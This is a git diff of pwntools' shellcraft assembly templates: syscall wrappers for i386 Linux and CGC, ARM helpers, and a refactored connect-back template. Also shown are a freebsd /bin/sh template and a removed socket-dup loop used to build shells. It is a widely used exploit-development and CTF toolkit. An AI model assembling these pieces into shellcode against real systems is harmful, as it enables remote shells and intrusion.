b/pwnlib/shellcraft/templates/arm/udiv_10.asm new file mode 100644 index 000000000..9125c9da5 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/udiv_10.asm @@ -0,0 +1,18 @@ +<% + from pwnlib.shellcraft import common + from pwnlib.shellcraft import arm +%> +<%page args="N"/> +<%docstring> +Divides r0 by 10. Result is stored in r0, N and Z flags are updated. + +Code is from generated from here: + https://raw.githubusercontent.com/rofirrim/raspberry-pi-assembler/master/chapter15/magic.py + +With code: + python magic.py 10 code_for_unsigned + + /* r0 = ${N} / 10 */ + ${arm.setregs({'r0': N, 'r1': 0xcccccccd})} + umull r1, r2, r1, r0 /* r1 <- Lower32Bits(r1*r0). r2 <- Upper32Bits(r1*r0) */ + movs r0, r2, LSR #3 /* r0 <- r2 >> 3 */ diff --git a/pwnlib/shellcraft/templates/arm/xor.asm b/pwnlib/shellcraft/templates/arm/xor.asm new file mode 100644 index 000000000..8e5e84ad6 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/xor.asm @@ -0,0 +1,67 @@ +<% + from pwnlib.shellcraft import pretty, common, arm, registers + from pwnlib.shellcraft.registers import arm as regs + from pwnlib.util.packing import pack, unpack + from pwnlib.context import context as ctx + from pwnlib.log import getLogger +%> +<%page args="key, address, count"/> +<%docstring> +XORs data a constant value. + +Args: + key (int,str): XOR key either as a 4-byte integer, + If a string, length must be a power of two, + and not longer than 4 bytes. + address (int): Address of the data (e.g. 0xdead0000, 'rsp') + count (int): Number of bytes to XOR. + +<% +log = getLogger('pwnlib.shellcraft.templates.arm.xor') + +# By default, assume the key is a register +key_size = ctx.bytes +key_pretty = key + +if not key in regs: + key_str = key + key_int = key + + if isinstance(key, int): + key_str = pack(key, bytes=4) + else: + key_int = unpack(key, 'all') + + if len(key_str) > ctx.bytes: + log.error("Key %s is too large (max %i bytes)" % (pretty(key), ctx.bytes)) + + if len(key_str) not in (1,2,4): + log.error("Key length must be a power of two (got %s)" % pretty(key)) + + key_size = len(key_str) + key_pretty = pretty(key_int) + +if count == 0 or key_size == 0: + return '/* noop xor */' + +start = common.label('start') + +## Determine the move size +word_name = {1:'BYTE', 2:'WORD', 4:'DWORD', 8:'QWORD'}[key_size] + +## Set up the register context +regctx = {'r0': count, 'r1': address} +if key in regs: + regctx['r2'] = key + key_pretty = 'r2' +%> + /* xor(${pretty(key)}, ${pretty(address)}, ${pretty(count)}) */ + ${arm.setregs(regctx)} + add r0, r0, r1 +${start}: + ldr r3, [r1] + eor r3, r3, r2 + str r3, [r1] + add r1, r1, ${key_size} + cmp r1, r0 + blt ${start} diff --git a/pwnlib/shellcraft/templates/i386/cgc/__doc__ b/pwnlib/shellcraft/templates/i386/cgc/__doc__ new file mode 100644 index 000000000..e69de29bb diff --git a/pwnlib/shellcraft/templates/i386/cgc/allocate.asm b/pwnlib/shellcraft/templates/i386/cgc/allocate.asm new file mode 100644 index 000000000..a5327c81f --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/cgc/allocate.asm @@ -0,0 +1,17 @@ +<% + from pwnlib.shellcraft.i386.cgc import syscall +%> +<%page args="length, is_X, addr"/> +<%docstring> +Invokes the syscall allocate. + +For more information, see: +https://github.com/CyberGrandChallenge/libcgc/blob/master/allocate.md + +Arguments: + length(int): length + is_X(int): is_X + addr(int): addr + + + ${syscall('SYS_allocate', length, is_X, addr)} diff --git a/pwnlib/shellcraft/templates/i386/cgc/cat.asm b/pwnlib/shellcraft/templates/i386/cgc/cat.asm new file mode 100644 index 000000000..a5327c81f --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/cgc/cat.asm @@ -0,0 +1,17 @@ +<% + from pwnlib.shellcraft.i386.cgc import syscall +%> +<%page args="length, is_X, addr"/> +<%docstring> +Invokes the syscall allocate. + +For more information, see: +https://github.com/CyberGrandChallenge/libcgc/blob/master/allocate.md + +Arguments: + length(int): length + is_X(int): is_X + addr(int): addr + + + ${syscall('SYS_allocate', length, is_X, addr)} diff --git a/pwnlib/shellcraft/templates/i386/cgc/deallocate.asm b/pwnlib/shellcraft/templates/i386/cgc/deallocate.asm new file mode 100644 index 000000000..6eaabd209 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/cgc/deallocate.asm @@ -0,0 +1,16 @@ +<% + from pwnlib.shellcraft.i386.cgc import syscall +%> +<%page args="addr, length"/> +<%docstring> +Invokes the syscall deallocate. + +For more information, see: +https://github.com/CyberGrandChallenge/libcgc/blob/master/deallocate.md + +Arguments: + addr(int): addr + length(int): length + + + ${syscall('SYS_deallocate', addr, length)} diff --git a/pwnlib/shellcraft/templates/i386/cgc/fdwait.asm b/pwnlib/shellcraft/templates/i386/cgc/fdwait.asm new file mode 100644 index 000000000..5d5bc9cd1 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/cgc/fdwait.asm @@ -0,0 +1,19 @@ +<% + from pwnlib.shellcraft.i386.cgc import syscall +%> +<%page args="nfds, readfds, writefds, timeout, readyfds"/> +<%docstring> +Invokes the syscall fdwait. + +For more information, see: +https://github.com/CyberGrandChallenge/libcgc/blob/master/fdwait.md + +Arguments: + nfds(int): nfds + readfds(int): readfds + writefds(int): writefds + timeout(int): timeout + readyfds(int): readyfds + + + ${syscall('SYS_fdwait', nfds, readfds, writefds, timeout, readyfds)} diff --git a/pwnlib/shellcraft/templates/i386/cgc/random.asm b/pwnlib/shellcraft/templates/i386/cgc/random.asm new file mode 100644 index 000000000..fe2842137 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/cgc/random.asm @@ -0,0 +1,17 @@ +<% + from pwnlib.shellcraft.i386.cgc import syscall +%> +<%page args="buf, count, rnd_bytes"/> +<%docstring> +Invokes the syscall random. + +For more information, see: +https://github.com/CyberGrandChallenge/libcgc/blob/master/random.md + +Arguments: + buf(int): buf + count(int): count + rnd_bytes(int): rnd_bytes + + + ${syscall('SYS_random', buf, count, rnd_bytes)} diff --git a/pwnlib/shellcraft/templates/i386/cgc/receive.asm b/pwnlib/shellcraft/templates/i386/cgc/receive.asm new file mode 100644 index 000000000..84d45d915 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/cgc/receive.asm @@ -0,0 +1,18 @@ +<% + from pwnlib.shellcraft.i386.cgc import syscall +%> +<%page args="fd, buf, count, bytes"/> +<%docstring> +Invokes the syscall receive. + +For more information, see: +https://github.com/CyberGrandChallenge/libcgc/blob/master/receive.md + +Arguments: + fd(int): fd + buf(int): buf + count(int): count + bytes(int): bytes + + + ${syscall('SYS_receive', fd, buf, count, bytes)} diff --git a/pwnlib/shellcraft/templates/i386/cgc/sendfile.asm b/pwnlib/shellcraft/templates/i386/cgc/sendfile.asm new file mode 100644 index 000000000..37667ad1d --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/cgc/sendfile.asm @@ -0,0 +1,29 @@ +<% + from pwnlib.shellcraft import okay + from pwnlib.shellcraft.i386 import cgc, mov +%> +<%page args="src, dst, n=0x80"/> +<%docstring> +Forwards data from one file descriptor to another. + +For more information, see: +https://github.com/CyberGrandChallenge/libcgc/blob/master/allocate.md + +Arguments: + src(int): Source file descriptor + dst(int): Destination file descriptor + + + push ebp + mov ebp, esp +% if n <= 0x80: + add esp, -${n} + ${cgc.receive(src, 'esp', n, 0)} +%else: + ${mov('eax', n)} + sub esp, eax + ${cgc.transmit(src, 'esp', 'eax', 0)} +%endif + ${cgc.transmit(dst, 'esp', n, 0)} + mov esp, ebp + pop ebp diff --git a/pwnlib/shellcraft/templates/i386/cgc/syscall.asm b/pwnlib/shellcraft/templates/i386/cgc/syscall.asm new file mode 100644 index 000000000..b02b71105 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/cgc/syscall.asm @@ -0,0 +1,42 @@ +<% + from pwnlib.shellcraft import i386 + from pwnlib.constants import Constant + from pwnlib.abi import linux_i386_syscall as abi +%> +<%page args="syscall = None, arg0 = None, arg1 = None, arg2 = None, arg3 = None, arg4 = None, arg5 = None"/> +<%docstring> +Args: [syscall_number, \*args] + Does a syscall + +Any of the arguments can be expressions to be evaluated by :func:`pwnlib.constants.eval`. + +<% + append_cdq = False + if isinstance(syscall, (str, unicode, Constant)) and str(syscall).startswith('SYS_'): + syscall_repr = str(syscall)[4:] + "(%s)" + args = [] + else: + syscall_repr = 'syscall(%s)' + if syscall == None: + args = ['?'] + else: + args = [repr(syscall)] + + for arg in [arg0, arg1, arg2, arg3, arg4, arg5]: + if arg == None: + args.append('?') + else: + args.append(repr(arg)) + while args and args[-1] == '?': + args.pop() + syscall_repr = syscall_repr % ', '.join(args) + + registers = abi.register_arguments + arguments = [syscall, arg0, arg1, arg2, arg3, arg4, arg5] + regctx = dict(zip(registers, arguments)) +%>\ + /* call ${syscall_repr} */ +%if any(a is not None for a in arguments): + ${i386.setregs(regctx)} +%endif + int 0x80 diff --git a/pwnlib/shellcraft/templates/i386/cgc/terminate.asm b/pwnlib/shellcraft/templates/i386/cgc/terminate.asm new file mode 100644 index 000000000..a5da87983 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/cgc/terminate.asm @@ -0,0 +1,15 @@ +<% + from pwnlib.shellcraft.i386.cgc import syscall +%> +<%page args="status"/> +<%docstring> +Invokes the syscall terminate. + +For more information, see: +https://github.com/CyberGrandChallenge/libcgc/blob/master/_terminate.md + +Arguments: + status(int): status + + + ${syscall('SYS_terminate', status)} diff --git a/pwnlib/shellcraft/templates/i386/cgc/transmit.asm b/pwnlib/shellcraft/templates/i386/cgc/transmit.asm new file mode 100644 index 000000000..453609789 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/cgc/transmit.asm @@ -0,0 +1,18 @@ +<% + from pwnlib.shellcraft.i386.cgc import syscall +%> +<%page args="fd, buf, count, tx_bytes"/> +<%docstring> +Invokes the syscall transmit. + +For more information, see: +https://github.com/CyberGrandChallenge/libcgc/blob/master/transmit.md + +Arguments: + fd(int): fd + buf(int): buf + count(int): count + tx_bytes(int): tx_bytes + + + ${syscall('SYS_transmit', fd, buf, count, tx_bytes)} diff --git a/pwnlib/shellcraft/templates/i386/crash.asm b/pwnlib/shellcraft/templates/i386/crash.asm new file mode 100644 index 000000000..4ee8dba6a --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/crash.asm @@ -0,0 +1,11 @@ +<%docstring> +Crash. + +Example: + + >>> run_assembly(shellcraft.crash()).poll(True) + -11 + + popad /* fill all registers with shit */ + xor esp, esp /* especially esp */ + jmp esp /* boom */ diff --git a/pwnlib/shellcraft/templates/i386/epilog.asm b/pwnlib/shellcraft/templates/i386/epilog.asm new file mode 100644 index 000000000..6cbc8e11f --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/epilog.asm @@ -0,0 +1,14 @@ +<%page args="nargs=0"/> +<%docstring> +Function epilogue. + +Arguments: + nargs(int): Number of arguments to pop off the stack. + + + leave +%if nargs: + ret ${nargs}*4 +%else: + ret +%endif diff --git a/pwnlib/shellcraft/templates/i386/freebsd/push.asm b/pwnlib/shellcraft/templates/i386/freebsd/push.asm index e65a1d0ec..da415d449 100644 --- a/pwnlib/shellcraft/templates/i386/freebsd/push.asm +++ b/pwnlib/shellcraft/templates/i386/freebsd/push.asm @@ -11,7 +11,7 @@ Thin wrapper around :func:`pwnlib.shellcraft.i386.push`, which sets Example: >>> print pwnlib.shellcraft.i386.freebsd.push('SYS_execve').rstrip() - /* push (SYS_execve) == 0x3b */ + /* push (SYS_execve) (0x3b) */ push 0x3b diff --git a/pwnlib/shellcraft/templates/i386/freebsd/sh.asm b/pwnlib/shellcraft/templates/i386/freebsd/sh.asm index f75d1e25b..f1b7cd824 100644 --- a/pwnlib/shellcraft/templates/i386/freebsd/sh.asm +++ b/pwnlib/shellcraft/templates/i386/freebsd/sh.asm @@ -1,5 +1,7 @@ <% from pwnlib.shellcraft import i386 %> -<%docstring>Execute /bin/sh +<%docstring> +Execute /bin/sh + /* Clear eax, ecx, edx */ diff --git a/pwnlib/shellcraft/templates/i386/function.asm b/pwnlib/shellcraft/templates/i386/function.asm new file mode 100644 index 000000000..ca8eb0e06 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/function.asm @@ -0,0 +1,65 @@ +<% + from pwnlib.shellcraft import i386 +%> +<%docstring> +Converts a shellcraft template into a callable function. + +Arguments: + template_sz(callable): + Rendered shellcode template. Any variable Arguments + should be supplied as registers. + name(str): + Name of the function. + registers(list): + List of registers which should be filled from the stack. + +:: + + >>> shellcode = '' + >>> shellcode += shellcraft.function('write', shellcraft.i386.linux.write, ) + + >>> hello = shellcraft.i386.linux.echo("Hello!", 'eax') + >>> hello_fn = shellcraft.i386.function(hello, 'eax').strip() + >>> exit = shellcraft.i386.linux.exit('edi') + >>> exit_fn = shellcraft.i386.function(exit, 'edi').strip() + >>> shellcode = ''' + ... push STDOUT_FILENO + ... call hello + ... push 33 + ... call exit + ... hello: + ... %(hello_fn)s + ... exit: + ... %(exit_fn)s + ... ''' % (locals()) + >>> p = run_assembly(shellcode) + >>> p.recvall() + 'Hello!' + >>> p.wait_for_close() + >>> p.poll() + 33 + +Notes: + + Can only be used on a shellcraft template which takes + all of its arguments as registers. For example, the + pushstr + +<%page args="name, template_function, *registers"/> +<% + ifdef = '_%s_' % name +%> +/* ${name}(${', '.join(registers)}) */ +#ifndef ${ifdef} +#define ${ifdef} +${name}: + /* Save stack */ + ${i386.prolog()} + /* Load arguments */ +% for i, reg in enumerate(registers): + ${i386.stackarg(i, reg)} +% endfor + ${template_function(*registers)} + /* Restore stack */ + ${i386.epilog(len(registers))} +#endif /* ${ifdef} */ diff --git a/pwnlib/shellcraft/templates/i386/getpc.asm b/pwnlib/shellcraft/templates/i386/getpc.asm new file mode 100644 index 000000000..0ca7af15d --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/getpc.asm @@ -0,0 +1,12 @@ +<% from pwnlib.shellcraft import i386 %> +<%docstring>Retrieves the value of EIP, stores it in the desired register. + +Args: + return_value: Value to return + +<%page args="register = 'ecx'"/> + + call INC_EBX +.equ INC_EBX, $-1 + ret + pop ${register} diff --git a/pwnlib/shellcraft/templates/i386/itoa.asm b/pwnlib/shellcraft/templates/i386/itoa.asm new file mode 100644 index 000000000..dc36b4088 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/itoa.asm @@ -0,0 +1,61 @@ +<% +from pwnlib.shellcraft import pretty, value, common, registers +from pwnlib.shellcraft.i386 import mov, pushstr +from pwnlib import constants +%> +<%docstring> +Converts an integer into its string representation, and pushes it +onto the stack. + +Arguments: + v(str, int): + Integer constant or register that contains the value to convert. + alloca + +Example: + + >>> sc = shellcraft.i386.mov('eax', 0xdeadbeef) + >>> sc += shellcraft.i386.itoa('eax') + >>> sc += shellcraft.i386.linux.write(1, 'esp', 32) + >>> run_assembly(sc).recvuntil('\x00') + '3735928559\x00' + +<%page args="v, buffer='esp', allocate_stack=True"/> +<% +itoa_loop = common.label('itoa_loop') +size_loop = common.label('size_loop') + +assert v in registers.i386 +%>\ + /* atoi(${pretty(v,0)}) */ +%if allocate_stack and buffer=='esp': + sub esp, 0x10 +%endif +## We need to know how long the string is, in order for +## the beginning of the string to be *exactly* at esp. + ${mov('edi', buffer)} + ${mov('eax', v)} + push eax /* save for later */ +${size_loop}: + ${mov('edx', 0)} + ${mov('ecx', 10)} + div ecx + inc edi + test eax, eax + jnz ${size_loop} + dec edi +## Now we begin the actual division process + pop eax + ${itoa_loop}: + ${mov('edx', 0)} +## ecx is already 10 + div ecx + add dl, ${ord('0')} + mov BYTE PTR [edi], dl + dec edi + test eax, eax + jnz ${itoa_loop} +## null terminate + ${mov('edx', 0)} + mov BYTE PTR [edi], dl + inc edi diff --git a/pwnlib/shellcraft/templates/i386/linux/accept.asm b/pwnlib/shellcraft/templates/i386/linux/accept.asm new file mode 100644 index 000000000..3be485460 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/accept.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, addr, addr_len"/> +<%docstring> +Invokes the syscall accept. See 'man 2 accept' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + addr_len(socklen_t): addr_len + + + ${syscall('SYS_accept', fd, addr, addr_len)} diff --git a/pwnlib/shellcraft/templates/i386/linux/access.asm b/pwnlib/shellcraft/templates/i386/linux/access.asm new file mode 100644 index 000000000..89c9078c3 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/access.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="name, type"/> +<%docstring> +Invokes the syscall access. See 'man 2 access' for more information. + +Arguments: + name(char): name + type(int): type + + + ${syscall('SYS_access', name, type)} diff --git a/pwnlib/shellcraft/templates/i386/linux/acct.asm b/pwnlib/shellcraft/templates/i386/linux/acct.asm new file mode 100644 index 000000000..20fa2be5e --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/acct.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall acct. See 'man 2 acct' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_acct', name)} diff --git a/pwnlib/shellcraft/templates/i386/linux/alarm.asm b/pwnlib/shellcraft/templates/i386/linux/alarm.asm new file mode 100644 index 000000000..e4ecd8817 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/alarm.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="seconds"/> +<%docstring> +Invokes the syscall alarm. See 'man 2 alarm' for more information. + +Arguments: + seconds(unsigned): seconds + + + ${syscall('SYS_alarm', seconds)} diff --git a/pwnlib/shellcraft/templates/i386/linux/bind.asm b/pwnlib/shellcraft/templates/i386/linux/bind.asm new file mode 100644 index 000000000..a98f9ef4a --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/bind.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall bind. See 'man 2 bind' for more information. + +Arguments: + fd(int): fd + addr(CONST_SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_bind', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/i386/linux/brk.asm b/pwnlib/shellcraft/templates/i386/linux/brk.asm new file mode 100644 index 000000000..0f4ac1c48 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/brk.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="addr"/> +<%docstring> +Invokes the syscall brk. See 'man 2 brk' for more information. + +Arguments: + addr(void): addr + + + ${syscall('SYS_brk', addr)} diff --git a/pwnlib/shellcraft/templates/i386/linux/chdir.asm b/pwnlib/shellcraft/templates/i386/linux/chdir.asm new file mode 100644 index 000000000..f30187663 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/chdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall chdir. See 'man 2 chdir' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_chdir', path)} diff --git a/pwnlib/shellcraft/templates/i386/linux/chmod.asm b/pwnlib/shellcraft/templates/i386/linux/chmod.asm new file mode 100644 index 000000000..6e69fa5b4 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/chmod.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="file, mode"/> +<%docstring> +Invokes the syscall chmod. See 'man 2 chmod' for more information. + +Arguments: + file(char): file + mode(mode_t): mode + + + ${syscall('SYS_chmod', file, mode)} diff --git a/pwnlib/shellcraft/templates/i386/linux/chown.asm b/pwnlib/shellcraft/templates/i386/linux/chown.asm new file mode 100644 index 000000000..b89712454 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/chown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="file, owner, group"/> +<%docstring> +Invokes the syscall chown. See 'man 2 chown' for more information. + +Arguments: + file(char): file + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_chown', file, owner, group)} diff --git a/pwnlib/shellcraft/templates/i386/linux/chroot.asm b/pwnlib/shellcraft/templates/i386/linux/chroot.asm new file mode 100644 index 000000000..8313b7641 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/chroot.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall chroot. See 'man 2 chroot' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_chroot', path)} diff --git a/pwnlib/shellcraft/templates/i386/linux/clock_getres.asm b/pwnlib/shellcraft/templates/i386/linux/clock_getres.asm new file mode 100644 index 000000000..98886f048 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/clock_getres.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="clock_id, res"/> +<%docstring> +Invokes the syscall clock_getres. See 'man 2 clock_getres' for more information. + +Arguments: + clock_id(clockid_t): clock_id + res(timespec): res + + + ${syscall('SYS_clock_getres', clock_id, res)} diff --git a/pwnlib/shellcraft/templates/i386/linux/clock_gettime.asm b/pwnlib/shellcraft/templates/i386/linux/clock_gettime.asm new file mode 100644 index 000000000..4c2022999 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/clock_gettime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="clock_id, tp"/> +<%docstring> +Invokes the syscall clock_gettime. See 'man 2 clock_gettime' for more information. + +Arguments: + clock_id(clockid_t): clock_id + tp(timespec): tp + + + ${syscall('SYS_clock_gettime', clock_id, tp)} diff --git a/pwnlib/shellcraft/templates/i386/linux/clock_nanosleep.asm b/pwnlib/shellcraft/templates/i386/linux/clock_nanosleep.asm new file mode 100644 index 000000000..84cf96c8a --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/clock_nanosleep.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="clock_id, flags, req, rem"/> +<%docstring> +Invokes the syscall clock_nanosleep. See 'man 2 clock_nanosleep' for more information. + +Arguments: + clock_id(clockid_t): clock_id + flags(int): flags + req(timespec): req + rem(timespec): rem + + + ${syscall('SYS_clock_nanosleep', clock_id, flags, req, rem)} diff --git a/pwnlib/shellcraft/templates/i386/linux/clock_settime.asm b/pwnlib/shellcraft/templates/i386/linux/clock_settime.asm new file mode 100644 index 000000000..ea363b7d3 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/clock_settime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="clock_id, tp"/> +<%docstring> +Invokes the syscall clock_settime. See 'man 2 clock_settime' for more information. + +Arguments: + clock_id(clockid_t): clock_id + tp(timespec): tp + + + ${syscall('SYS_clock_settime', clock_id, tp)} diff --git a/pwnlib/shellcraft/templates/i386/linux/clone.asm b/pwnlib/shellcraft/templates/i386/linux/clone.asm new file mode 100644 index 000000000..a1ce8c554 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/clone.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fn, child_stack, flags, arg, vararg"/> +<%docstring> +Invokes the syscall clone. See 'man 2 clone' for more information. + +Arguments: + fn(int): fn + child_stack(void): child_stack + flags(int): flags + arg(void): arg + vararg(int): vararg + + + ${syscall('SYS_clone', fn, child_stack, flags, arg, vararg)} diff --git a/pwnlib/shellcraft/templates/i386/linux/close.asm b/pwnlib/shellcraft/templates/i386/linux/close.asm new file mode 100644 index 000000000..09fe9e2b4 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/close.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall close. See 'man 2 close' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_close', fd)} diff --git a/pwnlib/shellcraft/templates/i386/linux/connect.asm b/pwnlib/shellcraft/templates/i386/linux/connect.asm index 10579ac02..f602f899f 100644 --- a/pwnlib/shellcraft/templates/i386/linux/connect.asm +++ b/pwnlib/shellcraft/templates/i386/linux/connect.asm @@ -1,10 +1,6 @@ -<% from pwnlib.shellcraft import common %> -<% from pwnlib.shellcraft.i386 import push, pushstr %> -<% from pwnlib.shellcraft.i386.linux import syscall %> -<% from pwnlib.constants import SOCK_STREAM, AF_INET, SYS_socketcall, SYS_socketcall_socket, SYS_socketcall_connect %> -<% from socket import htons, inet_aton, gethostbyname %> -<% from pwnlib.util import packing %> -<% from pwnlib.shellcraft import i386 %> +<% from pwnlib.shellcraft.i386 import pushstr %> +<% from pwnlib.shellcraft.i386.linux import socket, socketcall %> +<% from pwnlib.constants import SYS_socketcall_connect %> <% from pwnlib.util.net import sockaddr %> <%page args="host, port, network = 'ipv4'"/> @@ -19,7 +15,7 @@ Arguments: Examples: - >>> l = listen(timeout=1) + >>> l = listen(timeout=5) >>> assembly = shellcraft.i386.linux.connect('localhost', l.lport) >>> assembly += shellcraft.i386.pushstr('Hello') >>> assembly += shellcraft.i386.linux.write('edx', 'esp', 5) @@ -27,8 +23,8 @@ Examples: >>> l.wait_for_connection().recv() 'Hello' - >>> l = listen(fam='ipv6', timeout=1) - >>> assembly = shellcraft.i386.linux.connect('localhost', l.lport, 'ipv6') + >>> l = listen(fam='ipv6', timeout=5) + >>> assembly = shellcraft.i386.linux.connect('ip6-localhost', l.lport, 'ipv6') >>> p = run_assembly(assembly) >>> assert l.wait_for_connection() @@ -37,21 +33,13 @@ Examples: sockaddr, length, address_family = sockaddr(host, port, network) %>\ -/* open new socket */ - ${push(0)} - ${push(SOCK_STREAM)} - ${push(address_family)} - ${syscall(SYS_socketcall, SYS_socketcall_socket, 'esp', 0)} - -/* save opened socket */ +/* open new socket, save it */ + ${socket(network)} mov edx, eax /* push sockaddr, connect() */ ${pushstr(sockaddr, False)} mov ecx, esp - ${push(length)} /* socklen_t addrlen */ - push ecx /* sockaddr *addr */ - push edx /* sockfd */ - ${syscall(SYS_socketcall, SYS_socketcall_connect, 'esp')} + ${socketcall(SYS_socketcall_connect, 'edx', 'ecx', length)} /* Socket that is maybe connected is in edx */ diff --git a/pwnlib/shellcraft/templates/i386/linux/creat.asm b/pwnlib/shellcraft/templates/i386/linux/creat.asm new file mode 100644 index 000000000..0af7cd399 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/creat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="file, mode"/> +<%docstring> +Invokes the syscall creat. See 'man 2 creat' for more information. + +Arguments: + file(char): file + mode(mode_t): mode + + + ${syscall('SYS_creat', file, mode)} diff --git a/pwnlib/shellcraft/templates/i386/linux/dir.asm b/pwnlib/shellcraft/templates/i386/linux/dir.asm new file mode 100644 index 000000000..f99383a6e --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/dir.asm @@ -0,0 +1,17 @@ +<% from pwnlib.shellcraft import i386, pretty %> +<%page args="in_fd = 'ebp', size = 0x800, allocate_stack = True"/> +<%docstring> Reads to the stack from a directory. + +Args: + in_fd (int/str): File descriptor to be read from. + size (int): Buffer size. + allocate_stack (bool): allocate 'size' bytes on the stack. + +You can optioanlly shave a few bytes not allocating the stack space. + +The size read is left in eax. + +%if allocate_stack: + sub esp, ${pretty(size)} +%endif + ${i386.linux.getdents(in_fd, 'esp', size)} diff --git a/pwnlib/shellcraft/templates/i386/linux/dup.asm b/pwnlib/shellcraft/templates/i386/linux/dup.asm index 6102fc6f8..48636b70c 100644 --- a/pwnlib/shellcraft/templates/i386/linux/dup.asm +++ b/pwnlib/shellcraft/templates/i386/linux/dup.asm @@ -1,20 +1,13 @@ -<% from pwnlib.shellcraft import i386 %> -<% from pwnlib.shellcraft import common %> -<%page args="sock = 'ebp'"/> -<%docstring> -Args: [sock (imm/reg) = ebp] - Duplicates sock to stdin, stdout and stderr - + <% - dup = common.label("dup") - looplabel = common.label("loop") + from pwnlib.shellcraft.i386.linux import syscall %> +<%page args="fd, fd2"/> +<%docstring> +Invokes the syscall dup. See 'man 2 dup' for more information. -${dup}: - ${i386.mov('ebx', sock)} - ${i386.mov('ecx', 3)} -${looplabel}: - dec ecx +Arguments: + fd(int): fd + - ${i386.linux.syscall('SYS_dup2', 'ebx', 'ecx')} - jnz ${looplabel} + ${syscall('SYS_dup', fd)} diff --git a/pwnlib/shellcraft/templates/i386/linux/dup2.asm b/pwnlib/shellcraft/templates/i386/linux/dup2.asm new file mode 100644 index 000000000..067951909 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/dup2.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, fd2"/> +<%docstring> +Invokes the syscall dup2. See 'man 2 dup2' for more information. + +Arguments: + fd(int): fd + fd2(int): fd2 + + + ${syscall('SYS_dup2', fd, fd2)} diff --git a/pwnlib/shellcraft/templates/i386/linux/dup3.asm b/pwnlib/shellcraft/templates/i386/linux/dup3.asm new file mode 100644 index 000000000..546d89d43 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/dup3.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, fd2, flags"/> +<%docstring> +Invokes the syscall dup3. See 'man 2 dup3' for more information. + +Arguments: + fd(int): fd + 